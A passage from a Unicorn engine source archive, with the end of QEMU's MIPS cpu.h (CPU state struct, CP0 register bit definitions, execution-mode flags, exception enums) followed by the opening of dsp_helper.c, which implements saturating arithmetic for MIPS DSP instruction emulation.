64-bit are GPRs */ uint64_t mmr[32]; #define NUMBER_OF_MXU_REGISTERS 16 target_ulong mxu_gpr[NUMBER_OF_MXU_REGISTERS - 1]; target_ulong mxu_cr; #define MXU_CR_LC 31 #define MXU_CR_RC 30 #define MXU_CR_BIAS 2 #define MXU_CR_RD_EN 1 #define MXU_CR_MXU_EN 0 }; struct MIPSITUState; typedef struct CPUMIPSState CPUMIPSState; struct CPUMIPSState { TCState active_tc; CPUMIPSFPUContext active_fpu; uint32_t current_tc; uint32_t current_fpu; uint32_t SEGBITS; uint32_t PABITS; #if defined(TARGET_MIPS64) # define PABITS_BASE 36 #else # define PABITS_BASE 32 #endif target_ulong SEGMask; uint64_t PAMask; #define PAMASK_BASE ((1ULL << PABITS_BASE) - 1) int32_t msair; #define MSAIR_ProcID 8 #define MSAIR_Rev 0 /* * CP0 Register 0 */ int32_t CP0_Index; /* CP0_MVP* are per MVP registers. */ int32_t CP0_VPControl; #define CP0VPCtl_DIS 0 /* * CP0 Register 1 */ int32_t CP0_Random; int32_t CP0_VPEControl; #define CP0VPECo_YSI 21 #define CP0VPECo_GSI 20 #define CP0VPECo_EXCPT 16 #define CP0VPECo_TE 15 #define CP0VPECo_TargTC 0 int32_t CP0_VPEConf0; #define CP0VPEC0_M 31 #define CP0VPEC0_XTC 21 #define CP0VPEC0_TCS 19 #define CP0VPEC0_SCS 18 #define CP0VPEC0_DSC 17 #define CP0VPEC0_ICS 16 #define CP0VPEC0_MVP 1 #define CP0VPEC0_VPA 0 int32_t CP0_VPEConf1; #define CP0VPEC1_NCX 20 #define CP0VPEC1_NCP2 10 #define CP0VPEC1_NCP1 0 target_ulong CP0_YQMask; target_ulong CP0_VPESchedule; target_ulong CP0_VPEScheFBack; int32_t CP0_VPEOpt; #define CP0VPEOpt_IWX7 15 #define CP0VPEOpt_IWX6 14 #define CP0VPEOpt_IWX5 13 #define CP0VPEOpt_IWX4 12 #define CP0VPEOpt_IWX3 11 #define CP0VPEOpt_IWX2 10 #define CP0VPEOpt_IWX1 9 #define CP0VPEOpt_IWX0 8 #define CP0VPEOpt_DWX7 7 #define CP0VPEOpt_DWX6 6 #define CP0VPEOpt_DWX5 5 #define CP0VPEOpt_DWX4 4 #define CP0VPEOpt_DWX3 3 #define CP0VPEOpt_DWX2 2 #define CP0VPEOpt_DWX1 1 #define CP0VPEOpt_DWX0 0 /* * CP0 Register 2 */ uint64_t CP0_EntryLo0; /* * CP0 Register 3 */ uint64_t CP0_EntryLo1; #if defined(TARGET_MIPS64) # define CP0EnLo_RI 63 # define CP0EnLo_XI 62 #else # define CP0EnLo_RI 31 # define CP0EnLo_XI 30 #endif int32_t CP0_GlobalNumber; #define CP0GN_VPId 0 /* * CP0 Register 4 */ target_ulong CP0_Context; int32_t CP0_MemoryMapID; /* * CP0 Register 5 */ int32_t CP0_PageMask; int32_t CP0_PageGrain_rw_bitmask; int32_t CP0_PageGrain; #define CP0PG_RIE 31 #define CP0PG_XIE 30 #define CP0PG_ELPA 29 #define CP0PG_IEC 27 target_ulong CP0_SegCtl0; target_ulong CP0_SegCtl1; target_ulong CP0_SegCtl2; #define CP0SC_PA 9 #define CP0SC_PA_MASK (0x7FULL << CP0SC_PA) #define CP0SC_PA_1GMASK (0x7EULL << CP0SC_PA) #define CP0SC_AM 4 #define CP0SC_AM_MASK (0x7ULL << CP0SC_AM) #define CP0SC_AM_UK 0ULL #define CP0SC_AM_MK 1ULL #define CP0SC_AM_MSK 2ULL #define CP0SC_AM_MUSK 3ULL #define CP0SC_AM_MUSUK 4ULL #define CP0SC_AM_USK 5ULL #define CP0SC_AM_UUSK 7ULL #define CP0SC_EU 3 #define CP0SC_EU_MASK (1ULL << CP0SC_EU) #define CP0SC_C 0 #define CP0SC_C_MASK (0x7ULL << CP0SC_C) #define CP0SC_MASK (CP0SC_C_MASK | CP0SC_EU_MASK | CP0SC_AM_MASK | \ CP0SC_PA_MASK) #define CP0SC_1GMASK (CP0SC_C_MASK | CP0SC_EU_MASK | CP0SC_AM_MASK | \ CP0SC_PA_1GMASK) #define CP0SC0_MASK (CP0SC_MASK | (CP0SC_MASK << 16)) #define CP0SC1_XAM 59 #define CP0SC1_XAM_MASK (0x7ULL << CP0SC1_XAM) #define CP0SC1_MASK (CP0SC_MASK | (CP0SC_MASK << 16) | CP0SC1_XAM_MASK) #define CP0SC2_XR 56 #define CP0SC2_XR_MASK (0xFFULL << CP0SC2_XR) #define CP0SC2_MASK (CP0SC_1GMASK | (CP0SC_1GMASK << 16) | CP0SC2_XR_MASK) target_ulong CP0_PWBase; target_ulong CP0_PWField; #if defined(TARGET_MIPS64) #define CP0PF_BDI 32 /* 37..32 */ #define CP0PF_GDI 24 /* 29..24 */ #define CP0PF_UDI 18 /* 23..18 */ #define CP0PF_MDI 12 /* 17..12 */ #define CP0PF_PTI 6 /* 11..6 */ #define CP0PF_PTEI 0 /* 5..0 */ #else #define CP0PF_GDW 24 /* 29..24 */ #define CP0PF_UDW 18 /* 23..18 */ #define CP0PF_MDW 12 /* 17..12 */ #define CP0PF_PTW 6 /* 11..6 */ #define CP0PF_PTEW 0 /* 5..0 */ #endif target_ulong CP0_PWSize; #if defined(TARGET_MIPS64) #define CP0PS_BDW 32 /* 37..32 */ #endif #define CP0PS_PS 30 #define CP0PS_GDW 24 /* 29..24 */ #define CP0PS_UDW 18 /* 23..18 */ #define CP0PS_MDW 12 /* 17..12 */ #define CP0PS_PTW 6 /* 11..6 */ #define CP0PS_PTEW 0 /* 5..0 */ /* * CP0 Register 6 */ int32_t CP0_Wired; int32_t CP0_PWCtl; #define CP0PC_PWEN 31 #if defined(TARGET_MIPS64) #define CP0PC_PWDIREXT 30 #define CP0PC_XK 28 #define CP0PC_XS 27 #define CP0PC_XU 26 #endif #define CP0PC_DPH 7 #define CP0PC_HUGEPG 6 #define CP0PC_PSN 0 /* 5..0 */ int32_t CP0_SRSConf0_rw_bitmask; int32_t CP0_SRSConf0; #define CP0SRSC0_M 31 #define CP0SRSC0_SRS3 20 #define CP0SRSC0_SRS2 10 #define CP0SRSC0_SRS1 0 int32_t CP0_SRSConf1_rw_bitmask; int32_t CP0_SRSConf1; #define CP0SRSC1_M 31 #define CP0SRSC1_SRS6 20 #define CP0SRSC1_SRS5 10 #define CP0SRSC1_SRS4 0 int32_t CP0_SRSConf2_rw_bitmask; int32_t CP0_SRSConf2; #define CP0SRSC2_M 31 #define CP0SRSC2_SRS9 20 #define CP0SRSC2_SRS8 10 #define CP0SRSC2_SRS7 0 int32_t CP0_SRSConf3_rw_bitmask; int32_t CP0_SRSConf3; #define CP0SRSC3_M 31 #define CP0SRSC3_SRS12 20 #define CP0SRSC3_SRS11 10 #define CP0SRSC3_SRS10 0 int32_t CP0_SRSConf4_rw_bitmask; int32_t CP0_SRSConf4; #define CP0SRSC4_SRS15 20 #define CP0SRSC4_SRS14 10 #define CP0SRSC4_SRS13 0 /* * CP0 Register 7 */ int32_t CP0_HWREna; /* * CP0 Register 8 */ target_ulong CP0_BadVAddr; uint32_t CP0_BadInstr; uint32_t CP0_BadInstrP; uint32_t CP0_BadInstrX; /* * CP0 Register 9 */ int32_t CP0_Count; uint32_t CP0_SAARI; #define CP0SAARI_TARGET 0 /* 5..0 */ uint64_t CP0_SAAR[2]; #define CP0SAAR_BASE 12 /* 43..12 */ #define CP0SAAR_SIZE 1 /* 5..1 */ #define CP0SAAR_EN 0 /* * CP0 Register 10 */ target_ulong CP0_EntryHi; #define CP0EnHi_EHINV 10 target_ulong CP0_EntryHi_ASID_mask; /* * CP0 Register 11 */ int32_t CP0_Compare; /* * CP0 Register 12 */ int32_t CP0_Status; #define CP0St_CU3 31 #define CP0St_CU2 30 #define CP0St_CU1 29 #define CP0St_CU0 28 #define CP0St_RP 27 #define CP0St_FR 26 #define CP0St_RE 25 #define CP0St_MX 24 #define CP0St_PX 23 #define CP0St_BEV 22 #define CP0St_TS 21 #define CP0St_SR 20 #define CP0St_NMI 19 #define CP0St_IM 8 #define CP0St_KX 7 #define CP0St_SX 6 #define CP0St_UX 5 #define CP0St_KSU 3 #define CP0St_ERL 2 #define CP0St_EXL 1 #define CP0St_IE 0 int32_t CP0_IntCtl; #define CP0IntCtl_IPTI 29 #define CP0IntCtl_IPPCI 26 #define CP0IntCtl_VS 5 int32_t CP0_SRSCtl; #define CP0SRSCtl_HSS 26 #define CP0SRSCtl_EICSS 18 #define CP0SRSCtl_ESS 12 #define CP0SRSCtl_PSS 6 #define CP0SRSCtl_CSS 0 int32_t CP0_SRSMap; #define CP0SRSMap_SSV7 28 #define CP0SRSMap_SSV6 24 #define CP0SRSMap_SSV5 20 #define CP0SRSMap_SSV4 16 #define CP0SRSMap_SSV3 12 #define CP0SRSMap_SSV2 8 #define CP0SRSMap_SSV1 4 #define CP0SRSMap_SSV0 0 /* * CP0 Register 13 */ int32_t CP0_Cause; #define CP0Ca_BD 31 #define CP0Ca_TI 30 #define CP0Ca_CE 28 #define CP0Ca_DC 27 #define CP0Ca_PCI 26 #define CP0Ca_IV 23 #define CP0Ca_WP 22 #define CP0Ca_IP 8 #define CP0Ca_IP_mask 0x0000FF00 #define CP0Ca_EC 2 /* * CP0 Register 14 */ target_ulong CP0_EPC; /* * CP0 Register 15 */ int32_t CP0_PRid; target_ulong CP0_EBase; target_ulong CP0_EBaseWG_rw_bitmask; #define CP0EBase_WG 11 target_ulong CP0_CMGCRBase; /* * CP0 Register 16 */ int32_t CP0_Config0; #define CP0C0_M 31 #define CP0C0_K23 28 /* 30..28 */ #define CP0C0_KU 25 /* 27..25 */ #define CP0C0_MDU 20 #define CP0C0_MM 18 #define CP0C0_BM 16 #define CP0C0_Impl 16 /* 24..16 */ #define CP0C0_BE 15 #define CP0C0_AT 13 /* 14..13 */ #define CP0C0_AR 10 /* 12..10 */ #define CP0C0_MT 7 /* 9..7 */ #define CP0C0_VI 3 #define CP0C0_K0 0 /* 2..0 */ int32_t CP0_Config1; #define CP0C1_M 31 #define CP0C1_MMU 25 /* 30..25 */ #define CP0C1_IS 22 /* 24..22 */ #define CP0C1_IL 19 /* 21..19 */ #define CP0C1_IA 16 /* 18..16 */ #define CP0C1_DS 13 /* 15..13 */ #define CP0C1_DL 10 /* 12..10 */ #define CP0C1_DA 7 /* 9..7 */ #define CP0C1_C2 6 #define CP0C1_MD 5 #define CP0C1_PC 4 #define CP0C1_WR 3 #define CP0C1_CA 2 #define CP0C1_EP 1 #define CP0C1_FP 0 int32_t CP0_Config2; #define CP0C2_M 31 #define CP0C2_TU 28 /* 30..28 */ #define CP0C2_TS 24 /* 27..24 */ #define CP0C2_TL 20 /* 23..20 */ #define CP0C2_TA 16 /* 19..16 */ #define CP0C2_SU 12 /* 15..12 */ #define CP0C2_SS 8 /* 11..8 */ #define CP0C2_SL 4 /* 7..4 */ #define CP0C2_SA 0 /* 3..0 */ int32_t CP0_Config3; #define CP0C3_M 31 #define CP0C3_BPG 30 #define CP0C3_CMGCR 29 #define CP0C3_MSAP 28 #define CP0C3_BP 27 #define CP0C3_BI 26 #define CP0C3_SC 25 #define CP0C3_PW 24 #define CP0C3_VZ 23 #define CP0C3_IPLV 21 /* 22..21 */ #define CP0C3_MMAR 18 /* 20..18 */ #define CP0C3_MCU 17 #define CP0C3_ISA_ON_EXC 16 #define CP0C3_ISA 14 /* 15..14 */ #define CP0C3_ULRI 13 #define CP0C3_RXI 12 #define CP0C3_DSP2P 11 #define CP0C3_DSPP 10 #define CP0C3_CTXTC 9 #define CP0C3_ITL 8 #define CP0C3_LPA 7 #define CP0C3_VEIC 6 #define CP0C3_VInt 5 #define CP0C3_SP 4 #define CP0C3_CDMM 3 #define CP0C3_MT 2 #define CP0C3_SM 1 #define CP0C3_TL 0 int32_t CP0_Config4; int32_t CP0_Config4_rw_bitmask; #define CP0C4_M 31 #define CP0C4_IE 29 /* 30..29 */ #define CP0C4_AE 28 #define CP0C4_VTLBSizeExt 24 /* 27..24 */ #define CP0C4_KScrExist 16 #define CP0C4_MMUExtDef 14 #define CP0C4_FTLBPageSize 8 /* 12..8 */ /* bit layout if MMUExtDef=1 */ #define CP0C4_MMUSizeExt 0 /* 7..0 */ /* bit layout if MMUExtDef=2 */ #define CP0C4_FTLBWays 4 /* 7..4 */ #define CP0C4_FTLBSets 0 /* 3..0 */ int32_t CP0_Config5; int32_t CP0_Config5_rw_bitmask; #define CP0C5_M 31 #define CP0C5_K 30 #define CP0C5_CV 29 #define CP0C5_EVA 28 #define CP0C5_MSAEn 27 #define CP0C5_PMJ 23 /* 25..23 */ #define CP0C5_WR2 22 #define CP0C5_NMS 21 #define CP0C5_ULS 20 #define CP0C5_XPA 19 #define CP0C5_CRCP 18 #define CP0C5_MI 17 #define CP0C5_GI 15 /* 16..15 */ #define CP0C5_CA2 14 #define CP0C5_XNP 13 #define CP0C5_DEC 11 #define CP0C5_L2C 10 #define CP0C5_UFE 9 #define CP0C5_FRE 8 #define CP0C5_VP 7 #define CP0C5_SBRI 6 #define CP0C5_MVH 5 #define CP0C5_LLB 4 #define CP0C5_MRP 3 #define CP0C5_UFR 2 #define CP0C5_NFExists 0 int32_t CP0_Config6; int32_t CP0_Config7; uint64_t CP0_LLAddr; uint64_t CP0_MAAR[MIPS_MAAR_MAX]; int32_t CP0_MAARI; /* XXX: Maybe make LLAddr per-TC? */ /* * CP0 Register 17 */ target_ulong lladdr; /* LL virtual address compared against SC */ target_ulong llval; uint64_t llval_wp; uint32_t llnewval_wp; uint64_t CP0_LLAddr_rw_bitmask; int CP0_LLAddr_shift; /* * CP0 Register 18 */ target_ulong CP0_WatchLo[8]; /* * CP0 Register 19 */ uint64_t CP0_WatchHi[8]; #define CP0WH_ASID 16 /* * CP0 Register 20 */ target_ulong CP0_XContext; int32_t CP0_Framemask; /* * CP0 Register 23 */ int32_t CP0_Debug; #define CP0DB_DBD 31 #define CP0DB_DM 30 #define CP0DB_LSNM 28 #define CP0DB_Doze 27 #define CP0DB_Halt 26 #define CP0DB_CNT 25 #define CP0DB_IBEP 24 #define CP0DB_DBEP 21 #define CP0DB_IEXI 20 #define CP0DB_VER 15 #define CP0DB_DEC 10 #define CP0DB_SSt 8 #define CP0DB_DINT 5 #define CP0DB_DIB 4 #define CP0DB_DDBS 3 #define CP0DB_DDBL 2 #define CP0DB_DBp 1 #define CP0DB_DSS 0 /* * CP0 Register 24 */ target_ulong CP0_DEPC; /* * CP0 Register 25 */ int32_t CP0_Performance0; /* * CP0 Register 26 */ int32_t CP0_ErrCtl; #define CP0EC_WST 29 #define CP0EC_SPR 28 #define CP0EC_ITC 26 /* * CP0 Register 28 */ uint64_t CP0_TagLo; int32_t CP0_DataLo; /* * CP0 Register 29 */ int32_t CP0_TagHi; int32_t CP0_DataHi; /* * CP0 Register 30 */ target_ulong CP0_ErrorEPC; /* * CP0 Register 31 */ int32_t CP0_DESAVE; target_ulong CP0_KScratch[MIPS_KSCRATCH_NUM]; /* We waste some space so we can handle shadow registers like TCs. */ TCState tcs[MIPS_SHADOW_SET_MAX]; CPUMIPSFPUContext fpus[MIPS_FPU_MAX]; /* QEMU */ int error_code; #define EXCP_TLB_NOMATCH 0x1 #define EXCP_INST_NOTAVAIL 0x2 /* No valid instruction word for BadInstr */ uint32_t hflags; /* CPU State */ /* TMASK defines different execution modes */ #define MIPS_HFLAG_TMASK 0x1F5807FF #define MIPS_HFLAG_MODE 0x00007 /* execution modes */ /* * The KSU flags must be the lowest bits in hflags. The flag order * must be the same as defined for CP0 Status. This allows to use * the bits as the value of mmu_idx. */ #define MIPS_HFLAG_KSU 0x00003 /* kernel/supervisor/user mode mask */ #define MIPS_HFLAG_UM 0x00002 /* user mode flag */ #define MIPS_HFLAG_SM 0x00001 /* supervisor mode flag */ #define MIPS_HFLAG_KM 0x00000 /* kernel mode flag */ #define MIPS_HFLAG_DM 0x00004 /* Debug mode */ #define MIPS_HFLAG_64 0x00008 /* 64-bit instructions enabled */ #define MIPS_HFLAG_CP0 0x00010 /* CP0 enabled */ #define MIPS_HFLAG_FPU 0x00020 /* FPU enabled */ #define MIPS_HFLAG_F64 0x00040 /* 64-bit FPU enabled */ /* * True if the MIPS IV COP1X instructions can be used. This also * controls the non-COP1X instructions RECIP.S, RECIP.D, RSQRT.S * and RSQRT.D. */ #define MIPS_HFLAG_COP1X 0x00080 /* COP1X instructions enabled */ #define MIPS_HFLAG_RE 0x00100 /* Reversed endianness */ #define MIPS_HFLAG_AWRAP 0x00200 /* 32-bit compatibility address wrapping */ #define MIPS_HFLAG_M16 0x00400 /* MIPS16 mode flag */ #define MIPS_HFLAG_M16_SHIFT 10 /* * If translation is interrupted between the branch instruction and * the delay slot, record what type of branch it is so that we can * resume translation properly. It might be possible to reduce * this from three bits to two. */ #define MIPS_HFLAG_BMASK_BASE 0x803800 #define MIPS_HFLAG_B 0x00800 /* Unconditional branch */ #define MIPS_HFLAG_BC 0x01000 /* Conditional branch */ #define MIPS_HFLAG_BL 0x01800 /* Likely branch */ #define MIPS_HFLAG_BR 0x02000 /* branch to register (can't link TB) */ /* Extra flags about the current pending branch. */ #define MIPS_HFLAG_BMASK_EXT 0x7C000 #define MIPS_HFLAG_B16 0x04000 /* branch instruction was 16 bits */ #define MIPS_HFLAG_BDS16 0x08000 /* branch requires 16-bit delay slot */ #define MIPS_HFLAG_BDS32 0x10000 /* branch requires 32-bit delay slot */ #define MIPS_HFLAG_BDS_STRICT 0x20000 /* Strict delay slot size */ #define MIPS_HFLAG_BX 0x40000 /* branch exchanges execution mode */ #define MIPS_HFLAG_BMASK (MIPS_HFLAG_BMASK_BASE | MIPS_HFLAG_BMASK_EXT) /* MIPS DSP resources access. */ #define MIPS_HFLAG_DSP 0x080000 /* Enable access to DSP resources. */ #define MIPS_HFLAG_DSP_R2 0x100000 /* Enable access to DSP R2 resources. */ #define MIPS_HFLAG_DSP_R3 0x20000000 /* Enable access to DSP R3 resources. */ /* Extra flag about HWREna register. */ #define MIPS_HFLAG_HWRENA_ULR 0x200000 /* ULR bit from HWREna is set. */ #define MIPS_HFLAG_SBRI 0x400000 /* R6 SDBBP causes RI excpt. in user mode */ #define MIPS_HFLAG_FBNSLOT 0x800000 /* Forbidden slot */ #define MIPS_HFLAG_MSA 0x1000000 #define MIPS_HFLAG_FRE 0x2000000 /* FRE enabled */ #define MIPS_HFLAG_ELPA 0x4000000 #define MIPS_HFLAG_ITC_CACHE 0x8000000 /* CACHE instr. operates on ITC tag */ #define MIPS_HFLAG_ERL 0x10000000 /* error level flag */ target_ulong btarget; /* Jump / branch target */ target_ulong bcond; /* Branch condition (if needed) */ int SYNCI_Step; /* Address step size for SYNCI */ int CCRes; /* Cycle count resolution/divisor */ uint32_t CP0_Status_rw_bitmask; /* Read/write bits in CP0_Status */ uint32_t CP0_TCStatus_rw_bitmask; /* Read/write bits in CP0_TCStatus */ uint64_t insn_flags; /* Supported instruction set */ int saarp; /* Fields up to this point are cleared by a CPU reset */ #ifdef _MSC_VER int end_reset_fields; #else struct {} end_reset_fields; #endif /* Fields from here on are preserved across CPU reset. */ CPUMIPSMVPContext *mvp; CPUMIPSTLBContext *tlb; const mips_def_t *cpu_model; void *irq[8]; QEMUTimer *timer; /* Internal timer */ struct MIPSITUState *itu; MemoryRegion *itc_tag; /* ITC Configuration Tags */ target_ulong exception_base; /* ExceptionBase input to the core */ // Unicorn engine struct uc_struct *uc; }; /** * MIPSCPU: * @env: #CPUMIPSState * * A MIPS CPU. */ struct MIPSCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUMIPSState env; struct MIPSCPUClass cc; }; #define cpu_signal_handler cpu_mips_signal_handler extern void cpu_wrdsp(uint32_t rs, uint32_t mask_num, CPUMIPSState *env); extern uint32_t cpu_rddsp(uint32_t mask_num, CPUMIPSState *env); /* * MMU modes definitions. We carefully match the indices with our * hflags layout. */ #define MMU_USER_IDX 2 static inline int hflags_mmu_index(uint32_t hflags) { if (hflags & MIPS_HFLAG_ERL) { return 3; /* ERL */ } else { return hflags & MIPS_HFLAG_KSU; } } static inline int cpu_mmu_index(CPUMIPSState *env, bool ifetch) { return hflags_mmu_index(env->hflags); } typedef CPUMIPSState CPUArchState; typedef MIPSCPU ArchCPU; #include "exec/cpu-all.h" /* * Memory access type : * may be needed for precise access rights control and precise exceptions. */ enum { /* 1 bit to define user level / supervisor access */ ACCESS_USER = 0x00, ACCESS_SUPER = 0x01, /* 1 bit to indicate direction */ ACCESS_STORE = 0x02, /* Type of instruction that generated the access */ ACCESS_CODE = 0x10, /* Code fetch access */ ACCESS_INT = 0x20, /* Integer load/store access */ ACCESS_FLOAT = 0x30, /* floating point load/store access */ }; /* Exceptions */ enum { EXCP_NONE = -1, EXCP_RESET = 0, EXCP_SRESET, EXCP_DSS, EXCP_DINT, EXCP_DDBL, EXCP_DDBS, EXCP_NMI, EXCP_MCHECK, EXCP_EXT_INTERRUPT, /* 8 */ EXCP_DFWATCH, EXCP_DIB, EXCP_IWATCH, EXCP_AdEL, EXCP_AdES, EXCP_TLBF, EXCP_IBE, EXCP_DBp, /* 16 */ EXCP_SYSCALL, EXCP_BREAK, EXCP_CpU, EXCP_RI, EXCP_OVERFLOW, EXCP_TRAP, EXCP_FPE, EXCP_DWATCH, /* 24 */ EXCP_LTLBL, EXCP_TLBL, EXCP_TLBS, EXCP_DBE, EXCP_THREAD, EXCP_MDMX, EXCP_C2E, EXCP_CACHE, /* 32 */ EXCP_DSPDIS, EXCP_MSADIS, EXCP_MSAFPE, EXCP_TLBXI, EXCP_TLBRI, EXCP_LAST = EXCP_TLBRI, }; /* * This is an internally generated WAKE request line. * It is driven by the CPU itself. Raised when the MT * block wants to wake a VPE from an inactive state and * cleared when VPE goes from active to inactive. */ #define CPU_INTERRUPT_WAKE CPU_INTERRUPT_TGT_INT_0 int cpu_mips_signal_handler(int host_signum, void *pinfo, void *puc); #define MIPS_CPU_TYPE_SUFFIX "-" TYPE_MIPS_CPU #define MIPS_CPU_TYPE_NAME(model) model MIPS_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_MIPS_CPU bool cpu_supports_cps_smp(const char *cpu_type); bool cpu_supports_isa(const char *cpu_type, uint64_t isa); void cpu_set_exception_base(int vp_index, target_ulong address); /* mips_int.c */ void cpu_mips_soft_irq(CPUMIPSState *env, int irq, int level); /* mips_itu.c */ void itc_reconfigure(struct MIPSITUState *tag); /* helper.c */ target_ulong exception_resume_pc(CPUMIPSState *env); static inline void cpu_get_tb_cpu_state(CPUMIPSState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *flags) { *pc = env->active_tc.PC; *cs_base = 0; *flags = env->hflags & (MIPS_HFLAG_TMASK | MIPS_HFLAG_BMASK | MIPS_HFLAG_HWRENA_ULR); } #endif /* MIPS_CPU_H */ �����������������������������������������������������������unicorn-2.1.1/qemu/target/mips/dsp_helper.c���������������������������������������������������������0000664�0000000�0000000�00000416302�14675241067�0020710�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS ASE DSP Instruction emulation helpers for QEMU. * * Copyright (c) 2012 Jia Liu <proljc@gmail.com> * Dongxue Zhang <elta.era@gmail.com> * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "qemu/bitops.h" /* * As the byte ordering doesn't matter, i.e. all columns are treated * identically, these unions can be used directly. */ typedef union { uint8_t ub[4]; int8_t sb[4]; uint16_t uh[2]; int16_t sh[2]; uint32_t uw[1]; int32_t sw[1]; } DSP32Value; typedef union { uint8_t ub[8]; int8_t sb[8]; uint16_t uh[4]; int16_t sh[4]; uint32_t uw[2]; int32_t sw[2]; uint64_t ul[1]; int64_t sl[1]; } DSP64Value; /*** MIPS DSP internal functions begin ***/ #define MIPSDSP_ABS(x) (((x) >= 0) ? (x) : -(x)) #define MIPSDSP_OVERFLOW_ADD(a, b, c, d) (~((a) ^ (b)) & ((a) ^ (c)) & (d)) #define MIPSDSP_OVERFLOW_SUB(a, b, c, d) (((a) ^ (b)) & ((a) ^ (c)) & (d)) static inline void set_DSPControl_overflow_flag(uint32_t flag, int position, CPUMIPSState *env) { env->active_tc.DSPControl |= (target_ulong)flag << position; } static inline void set_DSPControl_carryflag(bool flag, CPUMIPSState *env) { env->active_tc.DSPControl &= ~(1 << 13); env->active_tc.DSPControl |= flag << 13; } static inline uint32_t get_DSPControl_carryflag(CPUMIPSState *env) { return (env->active_tc.DSPControl >> 13) & 0x01; } static inline void set_DSPControl_24(uint32_t flag, int len, CPUMIPSState *env) { uint32_t filter; filter = ((0x01 << len) - 1) << 24; filter = ~filter; env->active_tc.DSPControl &= filter; env->active_tc.DSPControl |= (target_ulong)flag << 24; } static inline void set_DSPControl_pos(uint32_t pos, CPUMIPSState *env) { target_ulong dspc; dspc = env->active_tc.DSPControl; #ifndef TARGET_MIPS64 dspc = dspc & 0xFFFFFFC0; dspc |= (pos & 0x3F); #else dspc = dspc & 0xFFFFFF80; dspc |= (pos & 0x7F); #endif env->active_tc.DSPControl = dspc; } static inline uint32_t get_DSPControl_pos(CPUMIPSState *env) { target_ulong dspc; uint32_t pos; dspc = env->active_tc.DSPControl; #ifndef TARGET_MIPS64 pos = dspc & 0x3F; #else pos = dspc & 0x7F; #endif return pos; } static inline void set_DSPControl_efi(uint32_t flag, CPUMIPSState *env) { env->active_tc.DSPControl &= 0xFFFFBFFF; env->active_tc.DSPControl |= (target_ulong)flag << 14; } #define DO_MIPS_SAT_ABS(size) \ static inline int##size##_t mipsdsp_sat_abs##size(int##size##_t a, \ CPUMIPSState *env) \ { \ if (a == INT##size##_MIN) { \ set_DSPControl_overflow_flag(1, 20, env); \ return INT##size##_MAX; \ } else { \ return MIPSDSP_ABS(a); \ } \ } DO_MIPS_SAT_ABS(8) DO_MIPS_SAT_ABS(16) DO_MIPS_SAT_ABS(32) #undef DO_MIPS_SAT_ABS /* get sum value */ static inline int16_t mipsdsp_add_i16(int16_t a, int16_t b, CPUMIPSState *env) { int16_t tempI; tempI = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x8000)) { set_DSPControl_overflow_flag(1, 20, env); } return tempI; } static inline int16_t mipsdsp_sat_add_i16(int16_t a, int16_t b, CPUMIPSState *env) { int16_t tempS; tempS = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, tempS, 0x8000)) { if (a > 0) { tempS = 0x7FFF; } else { tempS = 0x8000; } set_DSPControl_overflow_flag(1, 20, env); } return tempS; } static inline int32_t mipsdsp_sat_add_i32(int32_t a, int32_t b, CPUMIPSState *env) { int32_t tempI; tempI = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, tempI, 0x80000000)) { if (a > 0) { tempI = 0x7FFFFFFF; } else { tempI = 0x80000000; } set_DSPControl_overflow_flag(1, 20, env); } return tempI; } static inline uint8_t mipsdsp_add_u8(uint8_t a, uint8_t b, CPUMIPSState *env) { uint16_t temp; temp = (uint16_t)a + (uint16_t)b; if (temp & 0x0100) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0xFF; } static inline uint16_t mipsdsp_add_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint32_t temp; temp = (uint32_t)a + (uint32_t)b; if (temp & 0x00010000) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0xFFFF; } static inline uint8_t mipsdsp_sat_add_u8(uint8_t a, uint8_t b, CPUMIPSState *env) { uint8_t result; uint16_t temp; temp = (uint16_t)a + (uint16_t)b; result = temp & 0xFF; if (0x0100 & temp) { result = 0xFF; set_DSPControl_overflow_flag(1, 20, env); } return result; } static inline uint16_t mipsdsp_sat_add_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint16_t result; uint32_t temp; temp = (uint32_t)a + (uint32_t)b; result = temp & 0xFFFF; if (0x00010000 & temp) { result = 0xFFFF; set_DSPControl_overflow_flag(1, 20, env); } return result; } static inline int32_t mipsdsp_sat32_acc_q31(int32_t acc, int32_t a, CPUMIPSState *env) { int64_t temp; int32_t temp32, temp31, result; int64_t temp_sum; #ifndef TARGET_MIPS64 temp = ((uint64_t)env->active_tc.HI[acc] << 32) | (uint64_t)env->active_tc.LO[acc]; #else temp = (uint64_t)env->active_tc.LO[acc]; #endif temp_sum = (int64_t)a + temp; temp32 = (temp_sum >> 32) & 0x01; temp31 = (temp_sum >> 31) & 0x01; result = temp_sum & 0xFFFFFFFF; if (temp32 != temp31) { if (temp32 == 0) { result = 0x7FFFFFFF; } else { result = 0x80000000; } set_DSPControl_overflow_flag(1, 16 + acc, env); } return result; } #ifdef TARGET_MIPS64 /* a[0] is LO, a[1] is HI. */ static inline void mipsdsp_sat64_acc_add_q63(int64_t *ret, int32_t ac, int64_t *a, CPUMIPSState *env) { bool temp64; ret[0] = env->active_tc.LO[ac] + a[0]; ret[1] = env->active_tc.HI[ac] + a[1]; if (((uint64_t)ret[0] < (uint64_t)env->active_tc.LO[ac]) && ((uint64_t)ret[0] < (uint64_t)a[0])) { ret[1] += 1; } temp64 = ret[1] & 1; if (temp64 != ((ret[0] >> 63) & 0x01)) { if (temp64) { ret[0] = (0x01ull << 63); ret[1] = ~0ull; } else { ret[0] = (0x01ull << 63) - 1; ret[1] = 0x00; } 